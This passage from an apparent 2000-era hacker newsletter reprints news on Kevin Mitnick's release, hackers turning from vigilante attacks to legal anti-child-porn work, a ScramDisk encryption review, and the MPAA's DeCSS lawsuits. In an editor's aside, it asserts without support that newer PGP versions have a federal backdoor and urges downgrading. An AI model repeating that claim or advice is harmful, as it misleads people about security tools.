month. According to Kimberly Tracey, a ham radio operator in Los Angeles and
a friend of Mitnick's, he's been scrambling to renew it.
"This is going to be part of Kevin's life, because they've taken away
computers and everything else," said Tracey. "I hope they don't take away
this."
Mitnick was unavailable for comment on his imminent release. Sources close
to the hacker say he granted the CBS news show "60 Minutes" an exclusive
interview last week, which is scheduled to air Sunday.
But in an interview with ZDNet News last July, Mitnick complained about his
treatment by the government prosecutors, who he said were "grossly
exaggerating the losses in the case and the damages I caused." (See: Mitnick
says, "I was never a malicious person.")
DePayne: Anger a major stumbling block
DePayne, Mitnick's former friend and co-defendant, worries that Mitnick's
anger will work against him in his new life.
"I don't know if that's ever going to go away; I don't know if he'll be able
to deal with it," said DePayne, speaking from his home in Palo Alto. Calif.,
where he's serving six months house arrest for aiding Mitnick's hacking
during his fugitive years. "That's going to be a major stumbling block for
him going forward."
DePayne said he last heard from Mitnick the night of his arrest, on a
message left on his answering machine. Now 39 years old, divorced and
heading a small Internet company of his own, DePayne insists he doesn't plan
on associating with the impish hacker he first met as a brash teenager two
decades ago.
"I can't be fooling around with these stunts and practical jokes that Kevin
might want to fool around with," said DePayne. "I'll miss Kevin. I won't
miss the trouble he brings to the table."
Kevin Poulsen is a former hacker. He writes a weekly column for ZDTV's
CyberCrime.
____________________________________________________________________________
Mitnick: I was manipulated
That's how hacker Kevin Mitnick feels after almost five years behind bars.
Just freed from prison Friday, notorious hacker Kevin Mitnick slammed
prosecutors and a New York Times' reporter for allegedly treating him
unjustly in the court and in the media over the past six years.
Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425686,00.html?chkpt=zdnntop
Since this is *big* news, you can stay here and read the ASCII-version:
Mitnick: I was manipulated
By Robert Lemos, ZDNet News
UPDATED January 21, 2000 3:41 PM PT
Just freed from prison Friday, notorious hacker Kevin Mitnick slammed
prosecutors and a New York Times' reporter for allegedly treating him
unjustly in the court and in the media over the past six years.
"Prosecutors ... manipulated every aspect of this case from my personal
reputation, to the ability of my defense attorney to file motions in time,
and even to the extent of filing a 1,700-item exhibit list immediately
before a trial," said Mitnick, reading from a three-page statement to
reporters gathered near the Lompoc, Calif. prison facility, minutes after
being released from the medium-security prison.
Almost five years ago, federal authorities arrested Mitnick on a 25-count
indictment relating to misuse of Pacific Bell equipment for illegal wiretaps
and copying proprietary source code from Motorola, Sun Microsystems Inc.,
NEC Corp. and Novell, among others.
"My case is one of curiosity," said Mitnick. "There was no intent to defraud
anyone of anything."
New York Times' reporter John Markoff covered the latter portion of the
two-and-a-half year pursuit of Mitnick, and in a July 4, 1994, article
called him "Cyberspace's most wanted."
Mitnick blames the hype surrounding his elusive flight from authorities and
his subsequent arrest on Markoff's article. In addition, the 36-year old
ex-hacker claims that Markoff crossed the line by bringing authorities and
computer expert Tsutomu Shimomura together to track him down.
Mitnick went as far as to call the article libelous and defamatory.
In a Friday morning interview, Markoff stood by his reporting, saying that
the allegations were "really disappointing to me because it suggests that in
the past five years, and perhaps in the last 20 years, Kevin has not learned
anything. What he might have learned from all his time in prison is that it
is wrong to break into other people's computers. I don't think it is anymore
complex than that."
Markoff pointed out that Mitnick had been arrested five times in the last
20 years for computer-related crimes. "The problem is, and the reason the
judge kept him away from computers, (is that) this is the fifth time that he
has been arrested. It's not like they haven't given him chances," said
Markoff.
Markoff also denied any ethical breach. "I won't get into the specifics on
those three cases," Markoff said. "I want to say that I stand by my story,
and to note that it was written while Kevin was a fugitive from four law
enforcement agencies, and that's why it was written."
In court, Mitnick also claims he didn't get a fair shake.
Looking tired and much thinner than five years ago, the bespectacled
cybercriminal blamed prosecution for blocking his defense from acting on his
behalf. "Their method (in) this case was to manipulate the amount of loss to
exaggerate the alleged harm," he said.
"I've acknowledged since my arrest in February, 1995, that the actions I
took were illegal, and that I committed invasions of privacy. But to suggest
without reason or proof, as did Mr. Markoff and the prosecutors in this
case, that I had committed any type of fraud whatsoever, is simply untrue,
and unsupported by the evidence."
Damages 'grossly inflated'
In total, the prosecution estimated damages at $80 million by including the
full R&D costs of the applications and source code that Mitnick copied, even
though none of the code was ever sold to another company or is known to have
been used by a competitor.
"Everybody realizes that those (estimates) were greatly inflated," said
Jennifer Granick, a San Francisco defense attorney, who represented hacker
Kevin Poulsen in litigation following that hacker's release from prison.
(Poulsen is a ZDNet News contributor.)
The number may sound familiar. That's because David L. Smith, who plead
guilty to writing and releasing the Melissa virus in December, similarly
admitted to the prosecutor's assessed damages of $80 million.
It's no coincidence: Under federal law that is the maximum amount accounted
for by sentencing guidelines. In fact, it is usually the major factor in
determining the length of jail time.
That leads to a skewed pursuit of justice, said Granick. "The criminal
courts are here to deal with societal wrongs," she said. "It is not their
primary purpose to recompense the victims."
"I hope that the Kevin Mitnick case is the last case of the great '80s
hacker hysteria," she continued. "I hope that we won't have the same kind of
hype in the future so that people can get a fair shake in the media and in
court."
The U.S. Attorney's office could not comment by press time.
Kevin Poulsen contributed to this report.
____________________________________________________________________________
The case of the kung fu 'phreak'
Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about
his
kung fu ability? The real kung fu prankster is unmasked.
Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425425,00.html
Since this is *big* news, you can stay here and read the ASCII-version:
The case of the kung fu 'phreak'
Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about
his kung fu ability? The real kung fu prankster is unmasked.
By Kevin Poulsen, ZDNet News
January 21, 2000 11:59 AM PT
Two days after computer security expert Tsutomu Shimomura suffered the
now-legendary Christmas Day 1994 hack-attack that launched his search for
Kevin Mitnick, a mysterious message left on his voice mail box added
real-world menace to the cyberspace crime.
"Damn you, my technique is the best," said an odd voice in a faux-British
accent. "I know sendmail technique, and my style is much better ... Me and
my friends, we'll kill you."
Three days later the caller left another message, this time beginning with a
kung fu scream and affecting the voice of an actor in a martial arts film:
"Your security technique will be defeated. Your technique is no good."
In a third message, on Feb. 4, 1995, the caller chided Shimomura, who he
called "grasshopper," for mentioning the messages in a Newsweek article on
the intrusion and for putting digitized copies on the Internet. "Don't you
know that my kung fu is the best?"
The taunting phone calls were presumed to be from Shimomura's intruder, and
they became a fixture in the Shimomura vs. Mitnick manhunt story. Digitized
copies can be found on the official Web site for Shimomura's book,
"Takedown: The Pursuit and Capture of America's Most Wanted Computer
Outlaw -- By The Man Who Did It."
The equation of hacking with kung fu fighting has become a cultural
touchstone in its own right, and on more than one occasion the "Lone Gunmen"
hackers on Fox's "The X-Files" have been heard to mutter, "My kung fu is the
best."
The real kung fu 'phreak'
The only problem is, the thinly disguised voice never sounded at all like
Kevin Mitnick, and two of the messages came after the hacker had been
arrested.
"I heard that this guy named Shimomura had been hacked ... So I just
thought, What the hell, I'd leave some voice mails," says 31-year-old Zeke
Shif. "I used to watch kung fu movies a lot."
Under the handle "SN," Shif once had a solid reputation in the computer
underground as a "phone phreak" (i.e., phone hacker). But he says that, by
1995, his fear of "The Man" had long since scared him straight; he simply
succumbed to the temptation to make some prank phone calls.
"I thought I'd be funny," says Shif, who like many hackers from the early
1990s has gone on to work in the computer security trade, for Virginia-based
Network Security Technologies Inc.
The matter became less amusing when Shif read the news reports on Feb. 15,
1995. "I found out Mitnick got caught, and they were trying to link that to
the voice mail," says Shif, who responded by calling Shimomura again. "I
left a pre-emptive messages, saying, listen, this has nothing to do with any
Mitnick or anything, I'm just making fun of kung fu movies."
And this time, he didn't call him grasshopper.
____________________________________________________________________________
Mitnick Released
Hacker Kevin Mitnick, released after nearly five years in prison, blames the
media and federal prosecutors for his imprisonment.
Read the article online at:
http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2118614,00.html
Since this is *big* news, you can stay here and read the ASCII-version:
Mitnick Released
Hacker Kevin Mitnick, released after nearly five years in prison, blames
the media and federal prosecutors for his imprisonment.
By Iolande Bloxsom January 21, 2000
Convicted hacker Kevin Mitnick was released early this morning from federal
prison in Lompoc, California.
Possibly the most famous hacker ever, Mitnick was arrested in February of
1995, and has spent almost five years in prison.
In a prepared statement, Mitnick had harsh words for both the media and
federal prosecutors, both of whom he blamed for his long incarceration.
The media "grossly misreported" his case and created what he called the
"villain of the month." He also railed against the media for "defin[ing]
what is 'acceptable discussion'."
Mitnick singled out John Markoff, a reporter for The New York Times,
accusing him of "libelous and defamatory reporting-- and I use the word
reporting in quotes." He charged that Markoff's articles had facts that were
untrue, that were unproven, and that Markoff failed to disclose a previous
relationship. (Mitnick appeared in Cyberpunk, a book Markoff co-wrote with
Katie Hafner in 1995.) Finally, Mitnick claimed that the journalist "is a
millionaire" now because of his reporting on the convicted hacker.
In a later interview with ZDTV's Janet Yee, Markoff said he stood by his
reporting.
However, Mitnick had equal censure for prosecutors David Schindler and
Christopher Painter, who, he claimed "went as far as holding me in solitary
confinement," to try to force him to plead guilty. He says, though, that his
crime was one of trespass, rather than fraud. "I never deprived company's of
anything... there was never any evidence of fraud."
Mitnick pleaded guilty on March 26, 1999, to seven felonies, including
unauthorized intrusion into computers at cellular telephone companies,
software manufacturers, ISPs, and universities. He also admitted to
illegally downloading proprietary software from some of these companies.
In August, US District Court Judge Marianna Pfaelzer sentenced Mitnick to 46
months in prison and ordered him to pay $4,125 in restitution. She also
ordered Mitnick not to touch a computer or cellular phone without written
approval from his probation officer.
The sentence, governed by a plea agreement between Mitnick and his
prosecutors, ran on top of the 22 months he already received for cell-phone
cloning and a probation violation, for a total of 68 months. With credit for
his lengthy pretrial custody and some time off for good behavior, Mitnick
served just less than five years in prison.
Mitnick is headed back to Los Angeles, where his family lives.
By Iolande Bloxsom January 21, 2000
____________________________________________________________________________
Mitnick's Digital Divide
/* This is news from two weeks ago, but still a headline */
It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll
be trapped in 1991.
Read the online article at:
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2128328,00.htm
l
Since this is *big* news, you can stay here and read the ASCII-version:
Mitnick's Digital Divide
It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll
be trapped in 1991.
By Kevin Poulsen January 12, 2000
On Friday, January 21, hacker Kevin Mitnick will go free after nearly five
years behind bars. But when he walks out the gates of the Lompoc federal
correctional institution in California, he'll be burdened with a crippling
handicap: a court order barring him for up to three years from possessing or
using computers, "computer-related" equipment, software, and anything that
could conceivably give him access to the Internet.
These anti-computer restrictions are even more ridiculous today than when I
faced them upon leaving federal custody in June, 1996.
In the wired world of 2000, you'd be hard pressed to find a job flipping
burgers that didn't require access to a computerized cash register, and
three years from now McDonald's applicants will be expected to know a little
Java and a smattering of C++.
Since Mitnick's arrest in 1995, the Internet has grown from a hopeful ditty
to a deafening orchestral roar rattling the windows of society. The
importance of computer access in America has been acknowledged by the White
House in separate initiatives to protect technological infrastructure from
"cyberterrorists," and to bridge the so-called digital divide between
information haves and have-nots. "We must connect all of our citizens to the
Internet," vowed President Clinton last month.
He was not referring to Kevin Mitnick.
Mitnick, dubbed the "World's Most Notorious Hacker" by Guinness, pleaded
guilty on March 26 to seven felonies, and admitted to cracking computers at
cellular telephone companies, software manufacturers, ISPs, and
universities, as well as illegally downloading proprietary software. Though
he's never been accused of trying to make money from his crimes, he's been
in and out of trouble for his nonprofit work since he was a teenager.
So, the theory goes, keeping Mitnick away from computers will deprive a
known recidivist of the instruments of crime and set him on the road to
leading a good and law-abiding life.
I've heard that theory from prosecutors, judges and my (then) probation
officer. They all compare computers to lock picks, narcotics, and guns--
everything but a ubiquitous tool used by a quarter of all Americans and
nearly every industry.
Mitnick, we should believe, will be tempted in the next year or so to crack
some more computers and download some more software. But when the crucial
moment comes for him to commit a felony that could land him in prison for a
decade, his fingers will linger indecisively over the keyboard as he
realizes, "Wait! I can't use a computer! My probation officer will be
pissed!"
The fact is, if Mitnick chooses crime, he won't be deterred by the 11 months
in prison that a technical supervised release violation could carry. These
conditions only prevent him from making legitimate use of computers.
Mitnick's rehabilitation is up to him. But the system shouldn't throw up
obstructions by keeping him away from the mainstream, on the sidelines, and
out of the job market. His probation officer will have the power to ease his
restrictions, perhaps by allowing him to get a computer job with the
informed consent of his employer. That would be a good start.
January 21 will be a happy day for Mitnick, his family, and friends. But
getting out of prison after a long stretch carries challenges too. Nobody is
served by stranding the hacker on the wrong side of the digital divide.
____________________________________________________________________________
Mitnick: 'I was never a malicious person'
/* This is news from a few months ago, but still a headline */
Hacker files motion accusing government of misconduct -- goes on the record
with ZDNN. 'The federal government manipulated the facts.'
Read the online article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2306704,00.html?chkpt=zdnnrla
Since this is *big* news, you can stay here and read the ASCII-version:
Mitnick: 'I was never a malicious person'
Hacker files motion accusing government of misconduct -- goes on the record
with ZDNN. 'The federal government manipulated the facts.'
By Kevin Poulsen, ZDNet News
July 30, 1999 4:36 PM PT
Kevin Mitnick and his attorneys are asking a federal judge to unseal a
court filing that they claim proves the government was guilty of misconduct
while building its case against the hacker. The goal, says Mitnick in a rare
interview, is to clear his name.
"At the beginning of this case the federal government manipulated the facts
to allege losses that were grossly inflated," Mitnick said in a telephone
interview Thursday night from the Los Angeles Metropolitan Detention Center.
"Hopefully, if the court considers this motion and rules upon its merits, it
will clear me publicly of the allegations that I caused these significant
losses."
The motion, filed by defense attorney Don Randolph on July 22, is the
latest conflict in a case that's remained unusually acrimonious, considering
that both sides reached a plea settlement in March. Under the terms of the
agreement, Mitnick pleaded guilty to seven felonies and admitted to
penetrating computers at such companies as Motorola (NYSE:MOT), Fujitsu and
Sun Microsystems, (Nasdaq:SUNW) and downloading proprietary source code. On
Aug. 9, he's expected to be sentenced to 46 months in prison, on top of the
22 months he received for cell phone cloning and an earlier supervised
release violation.
Mitnick vexed by 'snowball effect'
The only sentencing issue left unresolved is the amount of money Mitnick
will owe his victims.
Prosecutors are seeking $1.5 million in restitution -- a modest figure
compared to the more than $80 million the government quoted to an appeals
court last year, when it successfully fought to hold the hacker without
bail. That figure, though no longer promulgated by prosecutors, vexes
Mitnick, who sees a "snowball effect" of bad press that began with a 1994
front-page article in the New York Times.
"Because of this assault that was made upon me by John Markoff of the New
York Times, then the federal government grossly exaggerating the losses in
the case and the damages I caused, I have a desire to clear my name,"
Mitnick said. "The truth of the matter is that I was never a malicious
person. I admit I was mischievous, but not malicious in any sense."
Markoff reported on Mitnick for the New York Times, and went on to
co-author Tsutomu Shimomura's book, "Takedown: The Pursuit and Capture of
America's Most Wanted Computer Outlaw -- By The Man Who Did It," slated as
an upcoming movie from Miramax. Markoff's portrayal of Mitnick, and the
profit it ultimately earned him, has been the subject of some criticism from
Mitnick's supporters, and raised eyebrows with a handful of journalists.
Markoff's most enduring Mitnick anecdote is the story that the hacker
cracked NORAD in the early 1980s, a claim that was recycled as recently as
last May by another New York Times reporter. "I never even attempted to
access their computer, let alone break into it," Mitnick said. "Nor did I do
a host of allegations that he says I'm guilty of."
For his part, Markoff says of the NORAD story: "I had a source who was a
friend of Kevin's who told me that. I was not the first person to report it,
nor the only person to report it."
Government collusion?
The July 22 motion filed by Mitnick's attorney accuses the government of
coaching victim companies on how to artificially inflate their losses. The
filing is based on documents Randolph subpoenaed from Sun, which show that
shortly after Mitnick's February 1995 arrest, the FBI specifically
instructed Sun to calculate its losses as "the value of the source code"
Mitnick downloaded, and to keep the figure "realistic."
Following the FBI's advice, Sun estimated $80 million in losses based on
the amount they paid to license the Unix operating system. Six other
companies responded, using software development costs as the primary
calculus of loss. The total bill came to $299,927,389.61, significantly more
than the $1.5 million the government says Mitnick inflicted in repair and
monitoring costs, and theft of services and the $5 million to $10 million
both sides stipulated to for purposes of sentencing.
"At the beginning of this litigation, the government misrepresented to the
federal judiciary, the public and the media the losses that occurred in my
case," Mitnick said.
To Randolph, it all smacks of collusion. "What comes out from the e-mails
that we have, is that the so-called loss figures solicited by the government
were research and development costs at best, f
antasy at worst," he said. "I
would classify it as government manipulation of the evidence."
However, prosecutor David Schindler dismissed Randolph's claims as "silly
and preposterous."
"What would be inappropriate is to tell them what dollar amount to arrive
at. In terms of the methodology, in terms of what is to be included in loss
amounts, that direction is something we often provide because we're aware of
what components are allowable under law, and which components are not," he
said.
Schindler said development costs are a valid indicator of victim loss, but
acknowledges that putting a dollar figure on software can be difficult.
Mitnick claims cover-up
Mitnick and his attorney both say there's more to the story, but they can't
talk about it. At Mitnick's last court appearance on July 12, the judge
granted a government request that any filings relating to victim loss be
sealed from the public.
"As much as the government would like to, you can't take the recipe for ice
and file it under seal and have it become confidential," said Mitnick, who,
along with his attorney, is challenging the confidentiality of the loss
information, and asking for the motion to be unsealed.
Mitnick claims he smells a cover-up. "The government should not be permitted
to bury the truth of the case from the public and the media by seeking and
obtaining a protective order to essentially force me to enter a code of
silence," he said.
"Our only concern, as it has been from day one, is the protection of the
victims of Mitnick's crimes," prosecutor Schindler said. "Why Mitnick and
his lawyers want to continue to harass, embarrass and abuse them remains a
mystery to us, but it's something that we will continue to oppose
vigorously."
Although the software costs are no longer being used against his client,
Randolph claimed that by "manipulating the loss figures," the government
raises the issue of whether even the more modest $1.5 million calculation is
accurate. In the sealed motion, he's seeking an evidentiary hearing to
explore the matter, and asking that Mitnick be released on a signature bond
pending that hearing.
And if Mitnick winds up owing money anyway? "We're asking for sanctions that
the government pay the restitution," Mitnick said, "and that the judge
recommend that I be immediately designated to a halfway house for the
government's misconduct in this case."
Excerpt of the Sun documents are available on the Free Kevin Web site,
maintained by members of a tireless grass-roots movement that's protested
the hacker's imprisonment for years. "I'd like to sincerely thank all my
friends and supporters for all the support they've given me over this long
period of time," Mitnick said. "I'd like to thank them from my heart."
Kevin Poulsen writes a weekly column for ZDTV's CyberCrime.
@HWA
25.0 Hackers vs Pedophiles, taking on a new approach.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/print/0,1294,33869,00.html
Hackers' New Tack on Kid Porn
by Lynn Burke
3:00 a.m. 3.Feb.2000 PST Kent Browne used to spend most of his free time
hacking Web sites, erasing hard drives, disabling servers, and knocking
folks out of chat rooms.
Like many hackers, he subscribed to the classic Machiavellian argument,
that the end justifies the means -- especially when the end was
eradicating child pornography on the Internet.
In early December, he and some fellow hackers from New York to Australia
started a group called Condemned, and announced their intention to take
down child pornographers by any means necessary.
But when Browne, 41, talked to Parry Aftab, an attorney who heads the
biggest and most well-known of the anti-child pornography groups -- Cyber
Angels -- he had a sudden change of heart.
"She said that the one problem we would have would be with law
enforcement. If they knew we were doing illegal stuff, they wouldn't touch
us with a 10-foot pole," he said. "Quite frankly, I'm an older guy. I've
got two kids. And I don't want to take any chances."
So now he and the rest of Condemned's loosely organized volunteers use
specially designed software and good old-fashioned Internet search engines
to ferret out the bad stuff and tip off federal agents in the U.S. Customs
Service and the FBI.
They're not alone. Natasha Grigori and her volunteer staff at
antichildporn.org have also decided to hang up their hacking shoes. At her
old organization, Anti Child Porn Militia, Grigori was dedicated to the
use of hacking to disable child pornography Web sites.
"We started out very angry, we started out very militant," she said.
But a trip to Def Con in Las Vegas made her change her mind. She started
talking with people on the right side of the law, and they told her they
supported her cause, but not her means.
"You can't stop a felony with a felony," she says now.
But the decision to go "legal" was a difficult one, and she lost most of
her volunteer hackers.
"Less than a dozen out of 250 stuck with us," she said. "They didn't like
the idea. They just thought we could rip and tear." Browne also says
he had a hard time leaving the hacking behind, mostly because he thought
it was right.
"Which is more illegal? Having children's pictures on the Internet or
hacking down the servers?" he asked. "Morally, I felt I was right."
But morals don't make hacking the right way to eliminate child
pornography, according to Aftab, the author of The Parent's Guide to
Protecting Your Children in Cyberspace. She says hacking complicates the
fight and casts a cloud over groups like hers that work closely with
law enforcement.
"We need help but we need the right help," she said.
When a site is taken down off the Web, it turns up somewhere else, usually
within minutes, she said. And if a server is destroyed, so is the evidence
of the person behind it.
"I'd frankly love to able to do all kinds of things to these groups," she
said. "You can't let your gut reaction dictate how you react to a
disgusting situation."
Getting a gauge on the prevalence of child pornography is difficult.
Experts say that most of the images of child pornography are downloaded
from newsgroups and traded in secret email clubs.
Aftab says true child pornography -- the kind that features children who
are very young -- isn't very easy to stumble across on the Web. It takes
some digging, she says, for her volunteers to find about 150 new sites
each month.
And the reason a group like hers is necessary, she says, is that the
technological savvy of the law enforcement is lacking.
"When the total technology behind the cops is that one guy uses AOL at
home, it's kind of hard to do cyber-forensics," she said.
Grigori said she recently asked a federal agent to come to her office for
a meeting to talk about the problem. "The one fed looked at my computer
like it was a toaster," she said. "I asked him for his email address, and
he said, 'I don't have a computer.'" The former deputy chief of the
Child Exploitation Unit at the Department of Justice, Robert Flores, also
says the government isn't doing its part.
Flores has had years of experience tracking down child pornographers and
pedophiles, both online and off. But he didn't think he could get his job
done as a government employee.
"I got to the point where I thought I could do more for families and kids
outside of the Justice Department," he said.
Flores is now the senior counsel for the Fairfax, Virginia-based National
Law Center for Children and Families, a legal resource center for child
pornography. "One of the things the Justice Department has failed to do is
say that the law applies on the Internet, that the Internet is not a
lawless place," he said.
The laws forbidding child pornography are fairly new.
The Supreme Court first ruled in New York v. Ferber in 1982 that child
pornography was not protected by the First Amendment. The decision said
the government could ban sexual images with serious literary or artistic
value in the interest of preventing "the harmful employment of
children to make sexually explicit materials for distribution."
Two years later, the justices said the government could outlaw not just
the distribution but also the possession of child porn.
And it is only in the last few years that the Internet has played a role
in laws and statutes governing pornography in general, and child
pornography in particular. There is currently a schism within the legal
community over the definition of child pornography, and whether it
should include computer-generated photographs or computer-enhanced
photographs that appear to feature children engaged in sex acts, but
actually contain adults.
But while the courts hammer out the issues, some say citizens shouldn't
take matters into their own hands.
Flores likened the Internet community's attempt to patrol child
pornography to picketers in front of a porn store. It's well-intentioned,
but it won't change anything.
"My recommendation is that this is not the job for a layman, quite
simply," he said. "That's why we pay taxes."
@HWA
26.0 SCRAMDISK (Windows) on the fly encryption for your data.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This isn't new, but it is a VERY good package, several of my colleagues and
myself use it for sensitive material on our winboxes. The bonus is, its
free software and will offer sufficient protection of data for most users.
This is especially useful for using personal data on your drives at work
and hiding it from the boss, its like having your own (secret) hard disk
in your work's machine. The other uses are obvious. A note about PGP,
the latest versions have a BACKDOOR that allows federal agencies access
to your data. Use an earlier version of PGP (4.2) if you want to make
things harder for federal agents to access your data(!) - Ed
The walls have ears, the net has taps, the government (not just your own)
IS listening and scanning your data, so protect your privacy and use
PGP for sensitive emails or data transmissions, also use SSH instead of
telnet for accessing your shell accounts if possible as many sites are
sniffed by hackers daily. - Ed
http://www.securiteam.com/tools/ScramDisk_-_Disk_Encryption_Tool.html
5/1/2000
ScramDisk - Disk Encryption Tool
Details
Scramdisk is a program that allows the creation and use of virtual
encrypted drives. Basically, you create a container file on an existing
hard drive that is locked with a specific password. This container can
then be mounted by the Scramdisk software, which creates a new drive
letter to represent the drive. The virtual drive can then only be accessed
with the correct pass phrase. Without the correct pass phrase the files on
the virtual drive are totally inaccessible - even physically extracting
the data will reveal nothing (since the contents are encrypted).
Once the pass phrase has been entered correctly and the drive is mounted,
the new virtual drive can be used as a normal drive; files can be saved
and retrieved and you can safely install applications onto the encrypted
drive.
Scramdisk allows virtual disks to be stored in a number of ways:
1. In a container file on a FAT formatted hard disk. 2. On an empty
partition. 3. Stored in the low bits of a WAV audio file (this is called
steganography). This last option is especially interesting, since this WAV
file can be sent by e-mail or carried on a diskette without attracting too
much attention (since by casual hearing the WAV file sounds like the
original sound file).
Details: Scramdisk can create virtual disks with a choice of a number of
'industry standard' encryption algorithms: Triple-DES, IDEA, MISTY1,
Blowfish, TEA (either 16 & 32 rounds), and Square. It also includes a
proprietary and very fast algorithm 'Summer' which is provided for minimal
security applications and for compatibility with older versions of
ScramDisk.
Why not use PGP? PGP is a great program, but it doesn't allow the
on-the-fly encryption of a disk's contents. Instead users have to:
1. Decrypt the existing file 2. Work on the data 3. Re-encrypt the data
The problem is, while the file is decrypted it is vulnerable to
interception.
Scramdisk is complementary to PGP; PGP is excellent for communication
security, but is somewhat lacking user friendliness when used for data
storage security.
Flaws in the system Scramdisk is not totally secure (and nor is any
security program!). There are a number of ways an attacker may try
infiltrating your system:
1. Look for applications that leak data. A very well known word-processor
has an interesting bug that leaks parts of the raw contents of the disk
when saving an OLE Compound Document.
2. Look for data that isn't deleted securely. Ok, everyone knows that you
can undelete a file easily. Did you know that even a file that has been
'wiped' could potentially be recovered by looking at the surface of the
disk? Deleted files should be securely wiped using an appropriate program
(PGP v6+ contains a secure file wiping program).
3. Look for data that has leaked in other ways. Temporary files and the
swap file spring to mind. These both need to be securely erased too.
4. Using Van Eck monitoring. Basically, electrical emissions from the
monitor, hard drive and even keyboard can be detected and recorded from a
distance away. This may allow an eavesdropper to see what's on your screen
or detect your pass phrase as you type it.
5. Brute Forcing. This can happen in a number of ways: they can try
brute-forcing your pass phrase (its important to use a large pass phrase
that isn't easily guessed, it helps to use both upper and lower case and
numbers as well) or they can try to brute force the algorithm. This is
hard work (and will take around 2^127 operations with most of the ciphers
included with ScramDisk - DES & Summer are exceptions).
6. Some of the ciphers included may be susceptible to attacks not known
about in public. The NSA/GCHQ may have a mechanism faster than brute-force
of attacking the algorithms. Scramdisk does not include any weak
algorithms in the original distribution (apart from Summer, which is
included for backwards compatibility), but who can tell what the
Intelligence Agencies can do with Blowfish, IDEA, 3DES et al?
7. Install an amended version of ScramDisk on your computer that secretly
stores your pass phrase so that it can be later read by a CIA agent. (Or
use a program like SKIn98 to do it!) Far fetched? Possibly, but you should
be aware that this kind of attack exists. There is no real way to defend
this attack. Check the PGP Signatures of the ScramDisk files against the
executables on your computer, but could your copy of PGP have also been
amended?
8. Beating you until you spill your pass phrase. Truth drugs also work,
apparently.
The software can be downloaded free of charge from:
http://www.scramdisk.clara.net/
@HWA
27.0 HNN:Jan 17: MPAA files more suits over DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hackernews.com/arch.html?011700
MPAA Files More Suits over DeCSS
contributed by Project Gamma and Macki
In an effort to stop further distribution of the DeCSS
program the Motion Picture Association of America has
filed lawsuits in federal courts. This follows similar action
two weeks ago by the DVD industry association. The
MPAA feels that allowing potential illegal copying of
DVDs with the DeCSS the program would be a violation
US copyright law.
Wired
http://www.wired.com/news/politics/0,1283,33680,00.html
ZD Net
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2422893,00.html?chkpt=p1bn
CNN has some interesting quotes from a Warner Home
Video spokesperson regarding this hole mess.
CNN - Look about halfway down
http://www.cnn.com/TRANSCRIPTS/0001/11/st.00.html
MPAA has a few interesting things to say as well.
MPAA
http://www.mpaa.org/dvd/content.htm
The folks over at CopyLeft have come up with a T-shirt
that has the source code to css_descramble.c printed
on it. (Cool, and only $15)
CopyLeft
http://copyleft.net/cgi-bin/copyleft/t039.pl?1&back
** These are really neat, check em out.. - Ed
2600 has posted the story of what has happened to
them since their involvement began including them being
named as a defendant in the case.
2600.com
http://www.2600.com/news/2000/0115.html
OpenDVD.org is attempting to cover all the
developments (and doing a damn good job) in this case
including the scheduled injunction for January 18, 2000.
OpenDVD.org
http://opendvd.org/
Articles:
Wired;
Movie Studios File DVD Hack Suit
Reuters
5:20 p.m. 14.Jan.2000 PST
The seven largest US movie studios filed their own lawsuits Friday to prevent
several Internet sites from distributing a program that could allow copying
of DVD movies.
The lawsuits, filed in federal courts in New York and Connecticut, followed
a broader lawsuit filed last month in state court in California by a DVD
equipment manufacturers group.
At issue is a program called DeCSS, written by a Norwegian programmer, that
allows users to bypass the encryption scheme used on DVDs to prevent unauthorized
copying.
But many Internet users and programmers say the software had a simpler, less
insidious goal. They said the program was needed to allow people to watch DVD
movies on computers running the Linux operating system.
The studios argued that by allowing potential illegal copying, the program
violated US copyright law. They asked the courts to prohibit four people from
distributing the program on their Web sites.
A spokesman for the Motion Picture Association of America, the studios'
lobbying group, said the Web sites involved were dvd-copy.com, krackdown.com
and ct2600.com. Dozens of other Web sites have also carried either the program
or source code instructions showing how to write the program.
"This is a case of theft," said Jack Valenti, president of the association.
"The posting of the de-encryption formula is no different from making and then
distributing unauthorized keys to a department store."
The people who posted the code said they had done nothing wrong, insisting that
the program was meant to allow viewing of DVD movies under Linux.
"I don't have illegal copies of movies on my site," said Shawn Reimerdes, a
computer programmer who maintains the dvd-copy.com Web site. "Just posting
these files shouldn't be illegal."
Internet advocacy groups have also opposed the lawsuits, arguing that the posting
of computer codes on a Web site is a form of speech protected by the First Amendment.
"This is definitely an infringement on freedom of speech," said Shari Steele,
director of legal services at the Electronic Frontier Foundation, a San Francisco
-based cyber-rights advocacy group. "What has been done was totally legal.
Posting of the program is legal and there are no pirated movies here."
Chris DiBona, who promotes Linux use for VA Linux Systems, said the industry had
refused to help create a program to play DVDs under Linux.
"The whole reason this happened is because the movie industry itself didn't support
Linux," DiBona said. "They thought they could keep this a secret. They failed."
The lawsuit relied on the 1998 Millennium Digital Copyright Act, which outlawed
the distribution of products designed to crack copyright protection schemes.
"If you can't protect that which you own, then you don't own anything," MPAA's
Valenti said.
In the California case, the court last month turned down the industry's request
for a temporary restraining order against a much wider array of defendants, many
of whom had only provided a link on their Web page to a page
containing the actual program. A hearing is scheduled for next week.
Friday's lawsuits were filed by Buena Vista Pictures, a unit of Walt Disney,
Metro-Goldwyn-Mayer, Paramount Pictures, a unit of Viacom, Sony's Sony Pictures
Entertainment, News Corp.'s Twentieth Century Fox Film, Universal Studios,
a unit of Seagram, and Warner Bros., a unit of Time Warner.
-=-
MPAA;
404 - sorry article vanished.
@HWA
28.0 WARftpd Security Alert (Will they EVER fix this software??)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://war.jgaa.com/alert/
